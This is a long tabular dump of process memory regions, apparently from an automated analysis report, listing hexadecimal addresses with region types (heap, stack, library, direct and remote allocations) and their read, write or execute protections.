||
|
252F000
|
stack
|
page read and write
|
||
|
460000
|
heap
|
page execute and read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
55C000
|
heap
|
page read and write
|
||
|
3822000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
574000
|
heap
|
page read and write
|
||
|
40E5000
|
trusted library allocation
|
page read and write
|
||
|
4731000
|
heap
|
page read and write
|
||
|
3650000
|
heap
|
page read and write
|
||
|
28E000
|
heap
|
page read and write
|
||
|
4EED000
|
heap
|
page read and write
|
||
|
1C7BF000
|
stack
|
page read and write
|
||
|
31F000
|
heap
|
page read and write
|
||
|
3A07000
|
trusted library allocation
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
1C2AC000
|
stack
|
page read and write
|
||
|
5371000
|
heap
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
1A36E000
|
stack
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
381F000
|
heap
|
page read and write
|
||
|
35E1000
|
trusted library allocation
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
4FAB000
|
heap
|
page read and write
|
||
|
57E000
|
heap
|
page read and write
|
||
|
11E000
|
stack
|
page read and write
|
||
|
373A000
|
heap
|
page read and write
|
||
|
1D40000
|
heap
|
page read and write
|
||
|
350000
|
direct allocation
|
page read and write
|
||
|
36EC000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
1FFF000
|
stack
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
3A09000
|
trusted library allocation
|
page read and write
|
||
|
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
1D0E000
|
heap
|
page execute and read and write
|
||
|
53EF000
|
heap
|
page read and write
|
||
|
375B000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
5FA000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
120A1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
1C2CD000
|
heap
|
page read and write
|
||
|
43EB000
|
stack
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
39B0000
|
trusted library allocation
|
page read and write
|
||
|
1F6F000
|
stack
|
page read and write
|
||
|
3B10000
|
heap
|
page read and write
|
||
|
354000
|
heap
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
3664000
|
heap
|
page read and write
|
||
|
1B4000
|
heap
|
page read and write
|
||
|
291E000
|
trusted library allocation
|
page read and write
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
290D000
|
trusted library allocation
|
page read and write
|
||
|
1EB0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
55D000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
57BF000
|
heap
|
page read and write
|
||
|
3AB000
|
direct allocation
|
page read and write
|
||
|
1A740000
|
heap
|
page execute and read and write
|
||
|
2971000
|
trusted library allocation
|
page read and write
|
||
|
56AE000
|
heap
|
page read and write
|
||
|
1CD0000
|
trusted library allocation
|
page read and write
|
||
|
1AF1E000
|
stack
|
page read and write
|
||
|
4AA8000
|
heap
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
23FA000
|
heap
|
page read and write
|
||
|
378000
|
heap
|
page read and write
|
||
|
7FE89966000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
1B570000
|
heap
|
page read and write
|
||
|
4A92000
|
heap
|
page read and write
|
||
|
1B106000
|
heap
|
page read and write
|
||
|
4535000
|
heap
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A37000
|
trusted library allocation
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3CE0000
|
heap
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
1AEAF000
|
stack
|
page read and write
|
||
|
3CB000
|
heap
|
page read and write
|
||
|
34A5000
|
trusted library allocation
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
1A146000
|
heap
|
page read and write
|
||
|
2915000
|
trusted library allocation
|
page read and write
|
||
|
5DF000
|
heap
|
page read and write
|
||
|
5A31000
|
trusted library allocation
|
page read and write
|
||
|
5997000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
4A8F000
|
heap
|
page read and write
|
||
|
3723000
|
trusted library allocation
|
page read and write
|
||
|
5EB000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
4554000
|
heap
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
2E2000
|
heap
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
25A000
|
heap
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
4615000
|
heap
|
page read and write
|
||
|
23F1000
|
heap
|
page read and write
|
||
|
4631000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
|
50CC000
|
heap
|
page read and write
|
||
|
4A9B000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
|
4FA4000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
429C000
|
stack
|
page read and write
|
||
|
5407000
|
heap
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
36E1000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
26D000
|
heap
|
page read and write
|
||
|
4551000
|
heap
|
page read and write
|
||
|
1CA0F000
|
stack
|
page read and write
|
||
|
35E0000
|
trusted library allocation
|
page read and write
|
||
|
372000
|
heap
|
page read and write
|
||
|
120F1000
|
trusted library allocation
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
3231000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
1A929000
|
stack
|
page read and write
|
||
|
58BC000
|
heap
|
page read and write
|
||
|
53FE000
|
heap
|
page read and write
|
||
|
5953000
|
heap
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
21E000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
3A09000
|
trusted library allocation
|
page read and write
|
||
|
219000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
1F50000
|
direct allocation
|
page read and write
|
||
|
373A000
|
heap
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
1E46000
|
heap
|
page read and write
|
||
|
1FE3000
|
direct allocation
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
595C000
|
heap
|
page read and write
|
||
|
5FF000
|
heap
|
page read and write
|
||
|
7FE8989B000
|
trusted library allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
362000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4FC7000
|
heap
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
28B0000
|
trusted library allocation
|
page read and write
|
||
|
1EF0000
|
heap
|
page read and write
|
||
|
4CB8000
|
heap
|
page read and write
|
||
|
1A92C000
|
heap
|
page read and write
|
||
|
50C0000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
2F3B000
|
trusted library allocation
|
page read and write
|
||
|
57C7000
|
heap
|
page read and write
|
||
|
1A8B8000
|
stack
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
3C31000
|
trusted library allocation
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
45F3000
|
heap
|
page read and write
|
||
|
5200000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
1C7BC000
|
stack
|
page read and write
|
||
|
386000
|
heap
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
2F31000
|
trusted library allocation
|
page read and write
|
||
|
23FE000
|
heap
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
3E3000
|
heap
|
page read and write
|
||
|
599B000
|
heap
|
page read and write
|
||
|
7FE89893000
|
trusted library allocation
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
8231000
|
trusted library allocation
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
4920000
|
trusted library allocation
|
page read and write
|
||
|
45F3000
|
heap
|
page read and write
|
||
|
5937000
|
heap
|
page read and write
|
||
|
2B00000
|
remote allocation
|
page read and write
|
||
|
3065000
|
trusted library allocation
|
page read and write
|
||
|
287B000
|
heap
|
page read and write
|
||
|
35D8000
|
trusted library allocation
|
page read and write
|
||
|
5947000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
1E8000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
2146000
|
trusted library allocation
|
page read and write
|
||
|
3FEF000
|
stack
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
58C6000
|
heap
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
36F3000
|
heap
|
page read and write
|
||
|
27F1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
23A000
|
heap
|
page read and write
|
||
|
4E25000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
2922000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
|
3D71000
|
trusted library allocation
|
page read and write
|
||
|
34A3000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
|
1A8FA000
|
heap
|
page read and write
|
||
|
34B2000
|
trusted library allocation
|
page read and write
|
||
|
339E000
|
stack
|
page read and write
|
||
|
5205000
|
heap
|
page read and write
|
||
|
45AD000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
3DB000
|
heap
|
page read and write
|
||
|
27D5000
|
trusted library allocation
|
page read and write
|
||
|
5D3000
|
heap
|
page read and write
|
||
|
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
|
57BD000
|
heap
|
page read and write
|
||
|
22DF000
|
stack
|
page read and write
|
||
|
4FD1000
|
heap
|
page read and write
|
||
|
4074000
|
trusted library allocation
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
3720000
|
trusted library allocation
|
page read and write
|
||
|
35E2000
|
trusted library allocation
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
3822000
|
heap
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
4ED6000
|
heap
|
page read and write
|
||
|
4A30000
|
heap
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
56B8000
|
heap
|
page read and write
|
||
|
2845000
|
heap
|
page read and write
|
||
|
58BE000
|
heap
|
page read and write
|
||
|
1B67B000
|
heap
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
1B80000
|
heap
|
page read and write
|
||
|
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
|
4B91000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
4D4D000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
2E4B000
|
stack
|
page read and write
|
||
|
3B2000
|
heap
|
page read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
40D9000
|
trusted library allocation
|
page read and write
|
||
|
244000
|
heap
|
page read and write
|
||
|
2E9000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
390000
|
direct allocation
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
572000
|
heap
|
page read and write
|
||
|
3550000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
267000
|
heap
|
page read and write
|
||
|
33A000
|
heap
|
page read and write
|
||
|
472E000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
22F000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
36F1000
|
heap
|
page read and write
|
||
|
45F7000
|
heap
|
page read and write
|
||
|
56AD000
|
heap
|
page read and write
|
||
|
2F3E000
|
trusted library allocation
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
1A728000
|
heap
|
page execute and read and write
|
||
|
387000
|
heap
|
page read and write
|
||
|
58E000
|
heap
|
page read and write
|
||
|
35EA000
|
trusted library allocation
|
page read and write
|
||
|
45F9000
|
heap
|
page read and write
|
||
|
7FE89890000
|
trusted library allocation
|
page read and write
|
||
|
53B0000
|
heap
|
page read and write
|
||
|
4AAB000
|
heap
|
page read and write
|
||
|
4F95000
|
heap
|
page read and write
|
||
|
2A3000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
50C0000
|
heap
|
page read and write
|
||
|
1CE0000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
4734000
|
heap
|
page read and write
|
||
|
1A20C000
|
stack
|
page read and write
|
||
|
3FCE000
|
trusted library allocation
|
page read and write
|
||
|
45F9000
|
heap
|
page read and write
|
||
|
3AF000
|
direct allocation
|
page read and write
|
||
|
3437000
|
direct allocation
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
4FA5000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
40E5000
|
trusted library allocation
|
page read and write
|
||
|
5970000
|
heap
|
page read and write
|
||
|
140000
|
trusted library allocation
|
page read and write
|
||
|
162000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
45FF000
|
heap
|
page read and write
|
||
|
5371000
|
heap
|
page read and write
|
||
|
1B575000
|
heap
|
page read and write
|
||
|
2310000
|
heap
|
page execute and read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
1A75E000
|
heap
|
page execute and read and write
|
||
|
2070000
|
heap
|
page execute and read and write
|
||
|
519000
|
heap
|
page read and write
|
||
|
269000
|
heap
|
page read and write
|
||
|
24C8000
|
stack
|
page read and write
|
||
|
262000
|
heap
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
2270000
|
heap
|
page read and write
|
||
|
1C1ED000
|
heap
|
page read and write
|
||
|
7FE89A3C000
|
trusted library allocation
|
page read and write
|
||
|
4AAB000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
35D5000
|
trusted library allocation
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
375F000
|
heap
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
4069000
|
trusted library allocation
|
page read and write
|
||
|
54F1000
|
heap
|
page read and write
|
||
|
50CC000
|
heap
|
page read and write
|
||
|
5F8000
|
heap
|
page read and write
|
||
|
3055000
|
trusted library allocation
|
page read and write
|
||
|
397000
|
direct allocation
|
page read and write
|
||
|
20EF000
|
stack
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
35B000
|
heap
|
page read and write
|
||
|
35E3000
|
trusted library allocation
|
page read and write
|
||
|
4E1D000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
53EF000
|
heap
|
page read and write
|
||
|
1A77E000
|
heap
|
page execute and read and write
|
||
|
248000
|
heap
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
1A16F000
|
heap
|
page read and write
|
||
|
1CD0000
|
heap
|
page execute and read and write
|
||
|
50BB000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
2F39000
|
trusted library allocation
|
page read and write
|
||
|
4430000
|
heap
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
420000
|
direct allocation
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
4558000
|
heap
|
page read and write
|
||
|
1B5B9000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
7FE89936000
|
trusted library allocation
|
page read and write
|
||
|
4EED000
|
heap
|
page read and write
|
||
|
4A8D000
|
heap
|
page read and write
|
||
|
2150000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
3FAF000
|
stack
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
1C1E9000
|
heap
|
page read and write
|
||
|
34AD000
|
trusted library allocation
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
36D0000
|
heap
|
page read and write
|
||
|
4A9A000
|
heap
|
page read and write
|
||
|
5E3000
|
heap
|
page read and write
|
||
|
23EE000
|
heap
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
56C0000
|
heap
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
1C2F5000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
2B6000
|
heap
|
page read and write
|
||
|
1B01F000
|
stack
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
594D000
|
heap
|
page read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
|
1CC0000
|
heap
|
page read and write
|
||
|
2E3000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
382F000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
1B0A0000
|
heap
|
page read and write
|
||
|
38B000
|
direct allocation
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
54F1000
|
heap
|
page read and write
|
||
|
34AF000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
1F24000
|
heap
|
page read and write
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
4557000
|
heap
|
page read and write
|
||
|
1C0DE000
|
stack
|
page read and write
|
||
|
4F1A000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
1F30000
|
direct allocation
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
56B8000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
2F9F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3816000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
3A0F000
|
trusted library allocation
|
page read and write
|
||
|
1AB7D000
|
stack
|
page read and write
|
||
|
4B91000
|
heap
|
page read and write
|
||
|
3D0000
|
direct allocation
|
page read and write
|
||
|
5031000
|
trusted library allocation
|
page read and write
|
||
|
1A8C3000
|
heap
|
page read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
4A9D000
|
heap
|
page read and write
|
||
|
3A9D000
|
stack
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
42C0000
|
trusted library allocation
|
page read and write
|
||
|
5B71000
|
trusted library allocation
|
page read and write
|
||
|
35DE000
|
trusted library allocation
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
7FE89884000
|
trusted library allocation
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
23B000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
50D0000
|
trusted library allocation
|
page read and write
|
||
|
23FA000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B55E000
|
stack
|
page read and write
|
||
|
1B1000
|
heap
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
3E70000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
36EF000
|
heap
|
page read and write
|
||
|
45AC000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
39FF000
|
trusted library allocation
|
page read and write
|
||
|
5370000
|
heap
|
page read and write
|
||
|
12121000
|
trusted library allocation
|
page read and write
|
||
|
36FE000
|
stack
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
43C000
|
heap
|
page read and write
|
||
|
34B4000
|
trusted library allocation
|
page read and write
|
||
|
1C1BB000
|
stack
|
page read and write
|
||
|
58C2000
|
heap
|
page read and write
|
||
|
4A8D000
|
heap
|
page read and write
|
||
|
1C80000
|
trusted library allocation
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
3B0000
|
direct allocation
|
page read and write
|
||
|
472C000
|
heap
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
574000
|
heap
|
page read and write
|
||
|
563000
|
heap
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
2A9000
|
heap
|
page read and write
|
||
|
5949000
|
heap
|
page read and write
|
||
|
3A50000
|
trusted library allocation
|
page read and write
|
||
|
453E000
|
heap
|
page read and write
|
||
|
50C4000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
23C000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
1B32C000
|
stack
|
page read and write
|
||
|
1D00000
|
trusted library allocation
|
page read and write
|
||
|
36F000
|
heap
|
page read and write
|
||
|
463B000
|
heap
|
page read and write
|
||
|
7FE89883000
|
trusted library allocation
|
page execute and read and write
|
||
|
35E0000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
3490000
|
remote allocation
|
page read and write
|
||
|
3B0000
|
direct allocation
|
page read and write
|
||
|
45F7000
|
heap
|
page read and write
|
||
|
1B1000
|
heap
|
page read and write
|
||
|
4E67000
|
heap
|
page read and write
|
||
|
26A000
|
heap
|
page read and write
|
||
|
440000
|
direct allocation
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
4619000
|
heap
|
page read and write
|
||
|
4B92000
|
heap
|
page read and write
|
||
|
463B000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
53FA000
|
heap
|
page read and write
|
||
|
5947000
|
heap
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
1C00000
|
heap
|
page read and write
|
||
|
3EDE000
|
stack
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
592E000
|
heap
|
page read and write
|
||
|
398000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
5E8000
|
heap
|
page read and write
|
||
|
1AC0000
|
heap
|
page read and write
|
||
|
1E40000
|
heap
|
page read and write
|
||
|
3EC0000
|
trusted library allocation
|
page read and write
|
||
|
5026000
|
heap
|
page read and write
|
||
|
23B0000
|
heap
|
page read and write
|
||
|
2F42000
|
trusted library allocation
|
page read and write
|
||
|
45C2000
|
heap
|
page read and write
|
||
|
3CB0000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
504D000
|
heap
|
page read and write
|
||
|
504A000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
348000
|
heap
|
page read and write
|
||
|
2C5C000
|
stack
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
3FF0000
|
trusted library allocation
|
page read and write
|
||
|
12C000
|
heap
|
page read and write
|
||
|
4970000
|
trusted library allocation
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
1A0EA000
|
heap
|
page read and write
|
||
|
53E000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
1C246000
|
heap
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
4F24000
|
heap
|
page read and write
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
2A3000
|
heap
|
page read and write
|
||
|
4A8D000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
36ED000
|
heap
|
page read and write
|
||
|
319B000
|
stack
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
1B099000
|
heap
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
3C60000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
354000
|
heap
|
page read and write
|
||
|
5785000
|
heap
|
page read and write
|
||
|
22A000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
598E000
|
heap
|
page read and write
|
||
|
3E3000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
8C31000
|
trusted library allocation
|
page read and write
|
||
|
2E2000
|
heap
|
page read and write
|
||
|
34B2000
|
trusted library allocation
|
page read and write
|
||
|
45FD000
|
heap
|
page read and write
|
||
|
453E000
|
heap
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
4558000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
